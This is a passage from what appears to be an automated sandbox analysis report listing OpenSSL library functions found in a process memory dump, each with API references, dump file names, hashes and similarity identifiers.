                                                            Function 6CF06530 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2i__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 314559513-0
                                                            • Opcode ID: 12f96066614700743eec4a672ae343f3a5ecf5120dffbaaec2d5113c89435767
                                                            • Instruction ID: 8f4a46e4382fb42a9458c3eb8ee92fb19df4e24ab6ecbe954c521a975d51006e
                                                            • Opcode Fuzzy Hash: 12f96066614700743eec4a672ae343f3a5ecf5120dffbaaec2d5113c89435767
                                                            • Instruction Fuzzy Hash: BE1198756197019FCB40DF39C68165FBBF1AB89718F42991CF5A8CB704D230E9498F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE7CD30 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • BN_CTX_start.LIBEAY32 ref: 6CE7CD55
                                                            • BN_CTX_get.LIBEAY32 ref: 6CE7CD5D
                                                            • BN_copy.LIBEAY32 ref: 6CE7CD71
                                                            • BN_CTX_end.LIBEAY32 ref: 6CE7CD8E
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CE7CDB4
                                                              • Part of subcall function 6CE7C790: bn_mul_add_words.LIBEAY32 ref: 6CE7C8EE
                                                              • Part of subcall function 6CE7C790: bn_sub_words.LIBEAY32 ref: 6CE7C961
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_copyX_endX_getX_start__stack_chk_failbn_mul_add_wordsbn_sub_words
                                                            • String ID:
                                                            • API String ID: 1182659954-0
                                                            • Opcode ID: 526239b30998d9b32064e6534f48c58bd1b4cee58b76275559bd2760f8f43f7c
                                                            • Instruction ID: a98a9437369dfaad3c32b1ae95a5c7aa48e549ad1e33b3da43309322bc358ae1
                                                            • Opcode Fuzzy Hash: 526239b30998d9b32064e6534f48c58bd1b4cee58b76275559bd2760f8f43f7c
                                                            • Instruction Fuzzy Hash: 1801D7716187108FC710EF79C98055FBBF8AB88358F11582EEA9587700D734E909CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF088F0 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ASN1_item_i2d.LIBEAY32(?,?,?,?,?,?,?,?,?,?,6CF08635), ref: 6CF08915
                                                            • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,6CF08635), ref: 6CF0892A
                                                            • ASN1_item_new.LIBEAY32 ref: 6CF08945
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_i2dN1_item_new__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 1700296266-0
                                                            • Opcode ID: 1df3c2e7800453c07710e29e36edffd70108f239284b22edd4524568e03fe351
                                                            • Instruction ID: 563f5789aea4b0ceebac29fcafd330a120dfb995f644ea71d5f34129024301c0
                                                            • Opcode Fuzzy Hash: 1df3c2e7800453c07710e29e36edffd70108f239284b22edd4524568e03fe351
                                                            • Instruction Fuzzy Hash: 060109756196019FCB00EF39C28151BB7F1AB89608F829D1CF594CB704E231D9498F87
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CED65C0 Relevance: 7.5, APIs: 5, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ENGINE_init.LIBEAY32 ref: 6CED65DB
                                                              • Part of subcall function 6CEBD570: CRYPTO_lock.LIBEAY32(?,?,?,?,00000000,?,6CE9E6CC), ref: 6CEBD5AB
                                                              • Part of subcall function 6CEBD570: CRYPTO_lock.LIBEAY32(?,?,?,?,00000000,?,6CE9E6CC), ref: 6CEBD5E2
                                                            • ENGINE_get_RAND.LIBEAY32 ref: 6CED6603
                                                            • ENGINE_finish.LIBEAY32 ref: 6CED661A
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$E_finishE_get_E_init
                                                            • String ID:
                                                            • API String ID: 340646689-0
                                                            • Opcode ID: 950c51f3bf72017bda7ed6d7646c9a012d2366ebd1afaf686474ac55a088b08e
                                                            • Instruction ID: 9fdaaa8f58db2ce8dbc9e80814c6e9fa2d3260605a92ba273405a4456509cc6b
                                                            • Opcode Fuzzy Hash: 950c51f3bf72017bda7ed6d7646c9a012d2366ebd1afaf686474ac55a088b08e
                                                            • Instruction Fuzzy Hash: 58016DB0A18602CBDB50AF3A968055B76F8AB0634CF271D3EE560C7B04E730E4868B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF7A540 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: ContentInfo_it$N1_item_freeN1_item_print__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2349195140-0
                                                            • Opcode ID: 4b3473bb0f7bbc1f576e9807732490154438dbd86d7c42d531c7774a1f23c51d
                                                            • Instruction ID: 40918c6e51668531dc605b5f3f5fa9927b618243502f48b032468b4196622439
                                                            • Opcode Fuzzy Hash: 4b3473bb0f7bbc1f576e9807732490154438dbd86d7c42d531c7774a1f23c51d
                                                            • Instruction Fuzzy Hash: 6F01D3758197409FCB10EF79C58080BBBF4AB89318F029D1EE9A497700D370E9098B96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF0C8B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 212COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_printfO_write
                                                            • String ID: GMT
                                                            • API String ID: 3776197352-3715256258
                                                            • Opcode ID: 4331ba001f952d219a395ce717abcd80017db9bb100af8b041bf7bae2c513bd0
                                                            • Instruction ID: 95409f17d5d2ca30778af74e8f3a93870d787721c9bd21d0d749bfb6ee394193
                                                            • Opcode Fuzzy Hash: 4331ba001f952d219a395ce717abcd80017db9bb100af8b041bf7bae2c513bd0
                                                            • Instruction Fuzzy Hash: 4991D0713096A78FC700DF14C0707ABFFF2BBC5749F0A8499E1895BA62D230A556DB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF4E4D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: sscanfstrchr
                                                            • String ID: :$U
                                                            • API String ID: 174233066-1012202889
                                                            • Opcode ID: a07fd0e0a60a95d5d77eaf265714f3af488b479f349615d21e62de103f32ed05
                                                            • Instruction ID: 7edb4aa7acc431b2a16ac5de4f384bb8b5a0098ec4b297e5144d65919557f781
                                                            • Opcode Fuzzy Hash: a07fd0e0a60a95d5d77eaf265714f3af488b479f349615d21e62de103f32ed05
                                                            • Instruction Fuzzy Hash: 72416A322193448BE710CF29C14065BFFF1AF85758F248E2CE8A99BB52D771E945CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF80C20 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
